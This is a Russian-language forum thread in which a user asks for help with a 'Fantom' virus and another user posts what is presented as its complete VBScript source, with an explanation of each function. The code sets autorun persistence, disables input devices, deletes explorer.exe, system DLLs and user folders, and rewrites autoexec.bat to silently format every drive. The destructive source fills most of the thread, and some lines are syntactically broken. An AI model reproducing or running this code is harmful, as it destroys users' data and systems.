• XSS.stack #1 – первый литературный журнал от юзеров форума

Rootkit и Fantom -кто с ними сталкивался

Отслеживать

Siren

HDD-drive
Пользователь
Регистрация
11.04.2006
Сообщения
22
Реакции
0
И так у меня домашний ПК попал под Fantom этот вирус съел 8гиг винта(уничтожив там файловую систему), и там же записался.В начале он представлял из себя архив(под кодом- в архиве находится файл помощи или справки-прочесть нельзя-т.к. архив под кодом)-т. вот он съел часть жёсткого, уничтожил пару приложений Windows а именно поиск(при открытии выходит пустое поле с крестиком), и медиаплэер(при попытке открыть выплывает "Внутренняя ошибка приложения.").А потом еще и модель процессора изменилась с Симпрона на Атлон и частота с 1.74-на1.04
С Руткитами я думаю все ясно- но я скачал обе проги по борьбе с ними-и обе ничего не нашли.
Такие симптомы наблюдаются и у 3их моих знакомых-у одного и подцепил Фантома.
Кто что может посоветовать кроме полного форматирования. :(
 
Вирус Fantom v 1.0
Описание Вирус писался написан на языке VBScript, функции при запуске через 5 секунд выдает системную ошибку, затем всего навсего заражает все , и начинает форматировать все диски, прописывается в автозагрузку, не видим антивирусам([size=8pt]уже видим), клонируется по почте всем кто записан в записной книжке, или кому отправляется письмо![/size]
Избавление Неизлечим
 
хмм...чтото непохоже! вобщем покопался в этом вире (vbs коде) т.к он сделан ан Virtual vasic то оченб похоже на то что в "описании вируса" а я его где то в иете нашел написано другое...нашел на одном сайте этот Fantom - оснбо серьезного вреда для WinXP(SP1&SP2) он не причинит

вот код вируса...
Источник: Fantom.vbs'
Set f = CreateObject("scripting.filesystemobject")
Set s = CreateObject("Wscript.Shell")
t=0: on error resume next
Set os = CreateObject("Shell.Application")
set ie = WScript.CreateObject("InternetExplorer.Application")
Set oe = WScript.CreateObject("Outlook.Application")



s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SwapNT", "rundll32 user32, SwapMouseButton"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Swap98", "rundll32.exe user.exe, swapmousebutton"
s.Run "rundll32 user32, SwapMouseButton"


s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Dead", "rundll32 keyboard,disable"
s.Run "rundll32.exe keyboard.exe, disable"


s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Mad", "rundll32 mouse,disable"
s.Run "rundll32.exe mouse.exe, disable"


os.MinimizeAll


Set File2 = f.GetFile(WScript.ScriptFullName)
File2.Copy ("c:\windows\System\Gigabyte.vbs")
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
"HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"

' Удаление C:\WINDOWS\explorer.exe
str="C:\WINDOWS\explorer.exe"
if f.fileExists(str)=true then
f.deletefile str,true
elseif f.folderExists(str)=true then
f.deletefolder str,true
End If

' Удаление C:\WINDOWS\explorer.scf
str="C:\WINDOWS\explorer.scf"
if f.fileExists(str)=true then
f.deletefile str,true
elseif f.folderExists(str)=true then
f.deletefolder str,true
End If

' Удаление C:\WINDOWS\system\SYSTEM.DRV
str="C:\WINDOWS\system\SYSTEM.DRV"
if f.fileExists(str)=true then
f.deletefile str,true
elseif f.folderExists(str)=true then
f.deletefolder str,true
End If

' Удаление C:\WINDOWS\system\SHELL.DLL
str="C:\WINDOWS\system\SHELL.DLL"
if f.fileExists(str)=true then
f.deletefile str,true
elseif f.folderExists(str)=true then
f.deletefolder str,true
End If

' Удаление C:\WINDOWS\system\MMSYSTEM.DLL
str="C:\WINDOWS\system\MMSYSTEM.DLL"
if f.fileExists(str)=true then
f.deletefile str,true
elseif f.folderExists(str)=true then
f.deletefolder str,true
End If

For Each Folder In s.SpecialFolders


f.deletefolder s.SpecialFolders ("Desktop"),true

if right(folder,15)="Aplication Data" then f.deletefolder folder,true


if right(folder,9)="PrintHood" then f.deletefolder folder,true


if right(folder,8)="ShellNew" then f.deletefolder folder,true

if right(folder,5)="FONTS" then f.deletefolder folder,true

if right(folder,7)="NetHood" then f.deletefolder folder,true


if right(folder,12)="Главное меню" then f.deletefolder folder,true

if right(folder,6)="SendTo" then f.deletefolder folder,true


if right(folder,6)="Recent" then f.deletefolder folder,true

' Удаление Автозагрузка
if right(folder,12)="Автозагрузка" then f.deletefolder folder,true


if right(folder,9)="Избранное" then f.deletefolder folder,true


if right(folder,13)="Мои документы" then f.deletefolder folder,true


if right(folder,9)="Программы" then f.deletefolder folder,true
Next

s.popup "Произошла критическая ошибка! Все приложения будут закрыты", 1, "Fatal error ", 0+16


If f.FileExists("d:\autoexec.bat") Then Str ="d:\autoexec.bat"
If f.FileExists("d:\Windows.000\autoexec.bat") Then Str ="d:\Windows.000\autoexec.bat"
If f.FileExists("d:\Windows\autoexec.bat") Then Str ="d:\Windows\autoexec.bat"
If f.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If f.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If f.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = f.GetFile(Str)
ab.Attributes = 0
Set autoexec = f.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@format f: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
s.Run Str, 5


s.Run "Rundll32.exe User.exe,ExitWindows

Серьезно опасен только для Win98,Win95,WinME т.к форматирует данные операционные системы через БАТник
If f.FileExists("d:\autoexec.bat") Then Str ="d:\autoexec.bat"
If f.FileExists("d:\Windows.000\autoexec.bat") Then Str ="d:\Windows.000\autoexec.bat"
If f.FileExists("d:\Windows\autoexec.bat") Then Str ="d:\Windows\autoexec.bat"
If f.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If f.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If f.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = f.GetFile(Str)
ab.Attributes = 0
Set autoexec = f.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@format f: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
s.Run Str, 5
Остальные функции не очень опасны...
Также может :
Поменять функции клавиш мышки местами
Вырубить клавиатуру(Только для Windows 95,98,Me)
Отключить мышь(Только для Windows 95,98,Me)
Минимизировать все окна
Запускаться при каждой перезагрузке
Удаляет :
C:\WINDOWS\explorer.exe
C:\WINDOWS\explorer.scf
C:\WINDOWS\system\SYSTEM.DRV
C:\WINDOWS\system\SHELL.DLL
C:\WINDOWS\system\MMSYSTEM.DLL
Удаление специальных папок:
Удаление Рабочего стола
Удаление Aplication Data
Удаление PrintHood
Удаление ShellNew
Удаление шрифтов
Удаление NetHood
Удаление Главное меню
Удаление SendTo
Удаление Recent
Удаление Автозагрузка
Удаление Избранное
Удаление Мои документы
Удаление Программы
Выводит сообщение :
Произошла критическая ошибка! Все приложения будут закрыты
И перезагружает компа...только на Windows 95,98,Me
 
:angry2: :nukesign: :help: :help: :help: формат не помог!!!!!!!!!! правда проблем с плэером и поисковиком нет а все остальное как и было!!!!!!!!
хе!-хе!мабуть хапанул я таки ed117 или 1ну из их модификаций.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх